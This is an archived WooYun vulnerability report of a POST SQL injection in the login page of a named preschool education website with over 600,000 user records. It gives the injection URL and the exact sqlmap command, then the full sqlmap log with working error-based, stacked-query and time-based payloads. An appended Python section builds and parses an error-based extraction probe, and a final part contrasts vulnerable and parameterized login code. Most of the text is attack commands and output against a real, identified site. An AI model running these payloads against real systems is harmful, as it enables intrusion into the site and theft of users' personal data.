WooYun (WooYun.org) historical vulnerability archive --- http://wy.zone.ci/
WooYun Drops articles, online reader --------- http://drop.zone.ci/
2015-10-19: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly.
2015-12-03: The vendor has actively ignored the vulnerability; details are now disclosed to the public.
Kaier Preschool Education Alliance website (krbb.cn): POST SQL injection (affects 600,000+ user records)
Injection point: http://www.krbb.cn/login/chklogin.asp
POST data: uid=88952634&pwd=88952634&cookieexists=false&yhm=88952634
sqlmap command: python sqlmap.py -u "http://www.krbb.cn/login/chklogin.asp" --data "uid=88952634&pwd=88952634&cookieexists=false&yhm=88952634&leixing=1&mm=88952634"
(The sqlmap command carries two parameters that the POST data line above omits, leixing=1 and mm=88952634; mm is the parameter sqlmap ultimately found injectable.)
[sqlmap screenshot]
The user table is far too large to dump, so I only counted one:
Database: www_krbb_cn
+-------------+---------+
| Table       | Entries |
+-------------+---------+
| dbo.Dv_User | 612629  |
+-------------+---------+
Counting all users, the total is certainly over a million.
Full sqlmap run:
[11:21:38] [INFO] testing connection to the target URL
[11:21:38] [INFO] heuristics detected web page charset 'GB2312'
[11:21:39] [INFO] testing if the target URL is stable. This can take a couple of seconds
[11:21:40] [INFO] target URL is stable
[11:21:40] [INFO] testing if POST parameter 'uid' is dynamic
[11:21:41] [WARNING] POST parameter 'uid' does not appear dynamic
[11:21:41] [WARNING] heuristic (basic) test shows that POST parameter 'uid' might not be injectable
[11:21:41] [INFO] testing for SQL injection on POST parameter 'uid'
[11:21:41] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:21:45] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[11:21:46] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[11:21:47] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[11:21:48] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[11:21:49] [INFO] testing 'MySQL inline queries'
[11:21:49] [INFO] testing 'PostgreSQL inline queries'
[11:21:49] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[11:21:49] [INFO] testing 'Oracle inline queries'
[11:21:50] [INFO] testing 'SQLite inline queries'
[11:21:50] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[11:21:51] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[11:21:53] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[11:21:55] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[11:21:56] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[11:21:58] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[11:22:00] [INFO] testing 'Oracle AND time-based blind'
[11:22:02] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[11:22:23] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[11:22:23] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[11:22:40] [WARNING] POST parameter 'uid' is not injectable
[11:22:40] [INFO] testing if POST parameter 'pwd' is dynamic
[11:22:40] [WARNING] POST parameter 'pwd' does not appear dynamic
[11:22:40] [WARNING] heuristic (basic) test shows that POST parameter 'pwd' might not be injectable
[11:22:40] [INFO] testing for SQL injection on POST parameter 'pwd'
[11:22:41] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:22:45] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[11:22:47] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[11:22:50] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[11:22:52] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[11:22:54] [INFO] testing 'MySQL inline queries'
[11:22:54] [INFO] testing 'PostgreSQL inline queries'
[11:22:54] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[11:22:55] [INFO] testing 'Oracle inline queries'
[11:22:55] [INFO] testing 'SQLite inline queries'
[11:22:55] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[11:22:57] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[11:22:59] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[11:23:01] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[11:23:02] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[11:23:02] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[11:23:04] [INFO] testing 'Oracle AND time-based blind'
[11:23:04] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[11:23:24] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[11:23:42] [WARNING] POST parameter 'pwd' is not injectable
[11:23:42] [INFO] testing if POST parameter 'cookieexists' is dynamic
[11:23:43] [WARNING] POST parameter 'cookieexists' does not appear dynamic
[11:23:43] [WARNING] heuristic (basic) test shows that POST parameter 'cookieexists' might not be injectable
[11:23:43] [INFO] testing for SQL injection on POST parameter 'cookieexists'
[11:23:43] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:23:46] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[11:23:48] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[11:23:52] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[11:23:54] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[11:23:55] [INFO] testing 'MySQL inline queries'
[11:23:55] [INFO] testing 'PostgreSQL inline queries'
[11:23:56] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[11:23:56] [INFO] testing 'Oracle inline queries'
[11:23:56] [INFO] testing 'SQLite inline queries'
[11:23:56] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[11:23:59] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[11:24:01] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[11:24:03] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[11:24:05] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[11:24:07] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[11:24:09] [INFO] testing 'Oracle AND time-based blind'
[11:24:11] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[11:24:25] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[11:24:48] [WARNING] POST parameter 'cookieexists' is not injectable
[11:24:48] [INFO] testing if POST parameter 'yhm' is dynamic
[11:24:48] [WARNING] POST parameter 'yhm' does not appear dynamic
[11:24:48] [WARNING] heuristic (basic) test shows that POST parameter 'yhm' might not be injectable
[11:24:48] [INFO] testing for SQL injection on POST parameter 'yhm'
[11:24:48] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:24:54] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[11:24:56] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[11:24:56] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[11:24:58] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[11:24:59] [INFO] testing 'MySQL inline queries'
[11:24:59] [INFO] testing 'PostgreSQL inline queries'
[11:24:59] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[11:24:59] [INFO] testing 'Oracle inline queries'
[11:24:59] [INFO] testing 'SQLite inline queries'
[11:24:59] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[11:25:00] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[11:25:01] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[11:25:02] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[11:25:04] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[11:25:06] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[11:25:08] [INFO] testing 'Oracle AND time-based blind'
[11:25:10] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[11:25:34] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[11:25:50] [WARNING] POST parameter 'yhm' is not injectable
[11:25:50] [INFO] testing if POST parameter 'leixing' is dynamic
[11:25:50] [WARNING] POST parameter 'leixing' does not appear dynamic
[11:25:50] [WARNING] heuristic (basic) test shows that POST parameter 'leixing' might not be injectable
[11:25:51] [INFO] testing for SQL injection on POST parameter 'leixing'
[11:25:51] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:25:57] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[11:25:58] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[11:26:00] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[11:26:02] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[11:26:04] [INFO] testing 'MySQL inline queries'
[11:26:05] [INFO] testing 'PostgreSQL inline queries'
[11:26:05] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[11:26:05] [INFO] testing 'Oracle inline queries'
[11:26:06] [INFO] testing 'SQLite inline queries'
[11:26:06] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[11:26:08] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[11:26:10] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[11:26:11] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[11:26:12] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[11:26:13] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[11:26:14] [INFO] testing 'Oracle AND time-based blind'
[11:26:15] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[11:26:31] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[11:26:51] [WARNING] POST parameter 'leixing' is not injectable
[11:26:51] [INFO] testing if POST parameter 'mm' is dynamic
[11:26:51] [WARNING] POST parameter 'mm' does not appear dynamic
[11:26:51] [INFO] heuristic (basic) test shows that POST parameter 'mm' might be injectable (possible DBMS: 'Microsoft SQL Server')
[11:26:51] [INFO] testing for SQL injection on POST parameter 'mm'
heuristic (parsing) test showed that the back-end DBMS could be 'Microsoft SQL Server'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
do you want to include all tests for 'Microsoft SQL Server' extending provided level (1) and risk (1) values? [Y/n]
[11:27:24] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:27:29] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Parameter replace (original value)'
[11:27:29] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause'
[11:27:29] [INFO] testing 'Microsoft SQL Server/Sybase stacked conditional-error blind queries'
[11:27:33] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[11:27:34] [INFO] POST parameter 'mm' is 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' injectable
[11:27:34] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[11:27:34] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[11:28:15] [INFO] POST parameter 'mm' seems to be 'Microsoft SQL Server/Sybase stacked queries' injectable
[11:28:15] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[11:28:15] [INFO] testing 'Microsoft SQL Server/Sybase AND time-based blind (heavy query)'
[11:29:09] [INFO] POST parameter 'mm' seems to be 'Microsoft SQL Server/Sybase AND time-based blind (heavy query)' injectable
[11:29:09] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[11:29:09] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[11:29:10] [WARNING] reflective value(s) found and filtering out
[11:29:10] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[11:29:11] [INFO] target URL appears to have 12 columns in query
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n]
[11:29:31] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. '--dbms=mysql')
POST parameter 'mm' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 1285 HTTP(s) requests:
---
Parameter: mm (POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: uid=88952634&pwd=88952634&cookieexists=false&yhm=88952634&leixing=1&mm=88952634' AND 3331=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(98)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (3331=3331) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(113)+CHAR(98)+CHAR(113))) AND 'NukJ'='NukJ

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: uid=88952634&pwd=88952634&cookieexists=false&yhm=88952634&leixing=1&mm=88952634'; WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
    Payload: uid=88952634&pwd=88952634&cookieexists=false&yhm=88952634&leixing=1&mm=88952634' AND 5957=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'RLxS'='RLxS
---
[11:29:33] [INFO] testing Microsoft SQL Server
[11:29:33] [INFO] confirming Microsoft SQL Server
[11:29:34] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
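The error-based payload sqlmap reported for 'mm' works by wrapping a subquery result in two marker strings (built with CHAR() so no quotes are needed), then forcing the whole thing into INT so that SQL Server's conversion error echoes the value back through the ASP error page. The following is an added example, not code from the report or from the krbb.cn site: it decodes the page's own CHAR() markers, builds a probe of the same shape, parses a constructed SQL Server 2000 style error text to recover the injected value, and contrasts the string-concatenated login query that makes 'mm' injectable with a parameterized one. The column names, the meaning of yhm/mm/leixing (user name, password, account type), the use of SQLite in place of SQL Server 2000 for the login part, and the wording of the error message are assumptions.

```python
import re
import sqlite3


def decode_char_concat(expr):
    """Turn a T-SQL 'CHAR(113)+CHAR(107)+...' expression into the plain string."""
    return "".join(chr(int(n)) for n in re.findall(r"CHAR\((\d+)\)", expr))


# Markers taken verbatim from the page's error-based payload.
PREFIX = decode_char_concat("CHAR(113)+CHAR(107)+CHAR(98)+CHAR(98)+CHAR(113)")  # qkbbq
SUFFIX = decode_char_concat("CHAR(113)+CHAR(98)+CHAR(113)+CHAR(98)+CHAR(113)")  # qbqbq


def build_error_probe(inner_select, tag="NukJ", num=3331):
    """Same shape as sqlmap's reported payload for 'mm': the subquery result is
    wrapped in the markers and CONVERTed to INT so the conversion error carries it."""
    return (f"88952634' AND {num}=CONVERT(INT,(SELECT '{PREFIX}'+({inner_select})+'{SUFFIX}'))"
            f" AND '{tag}'='{tag}")


def extract_from_error(error_text, prefix=PREFIX, suffix=SUFFIX):
    """Pull the injected value out of the DBMS error text between the markers."""
    m = re.search(re.escape(prefix) + r"(.*?)" + re.escape(suffix), error_text, re.S)
    return m.group(1) if m else None


# Constructed sample of what classic-ASP ADO relays when the CONVERT above fails on
# SQL Server 2000 (the CASE in the page's probe yields CHAR(49), i.e. '1'). The
# wording is an assumption; the marker placement is exactly what the payload produces.
SAMPLE_ERROR = ("Microsoft OLE DB Provider for SQL Server error '80040e07'\n"
                "Syntax error converting the varchar value 'qkbbq1qbqbq' "
                "to a column of data type int.")


# Vulnerable vs. parameterized login modelled on chklogin.asp's parameters.
# Table/column names are assumptions (only dbo.Dv_User is named on the page).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Dv_User (UserID INTEGER, UserName TEXT, "
                 "UserPassword TEXT, UserType INTEGER)")
    conn.execute("INSERT INTO Dv_User VALUES (1, 'admin', 's3cret', 1)")  # constructed row
    return conn


def vulnerable_login(conn, yhm, mm, leixing):
    # String concatenation: whatever arrives in 'mm' becomes SQL text.
    sql = (f"SELECT UserID FROM Dv_User WHERE UserName='{yhm}' "
           f"AND UserPassword='{mm}' AND UserType={leixing}")
    return conn.execute(sql).fetchall()


def safe_login(conn, yhm, mm, leixing):
    # Bound parameters: the password is compared as data, never parsed as SQL.
    sql = "SELECT UserID FROM Dv_User WHERE UserName=? AND UserPassword=? AND UserType=?"
    return conn.execute(sql, (yhm, mm, int(leixing))).fetchall()


if __name__ == "__main__":
    conn = make_db()
    bypass = "88952634' OR 'NukJ'='NukJ"   # tail shape of the page's payload
    print("vulnerable:", vulnerable_login(conn, "admin", bypass, 1))  # [(1,)]
    print("parameterized:", safe_login(conn, "admin", bypass, 1))     # []
    print("probe:", build_error_probe("SELECT @@version"))
    print("leaked:", extract_from_error(SAMPLE_ERROR))                  # 1
```

The stacked-queries and heavy-query payloads in the report work on the same concatenation defect; the parameterized form above closes all three at once, which is why the fix is in the login code rather than in filtering individual characters.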
The vendor could not be reached, or actively declined to respond.
Vulnerability Rank: 15 (WooYun rating)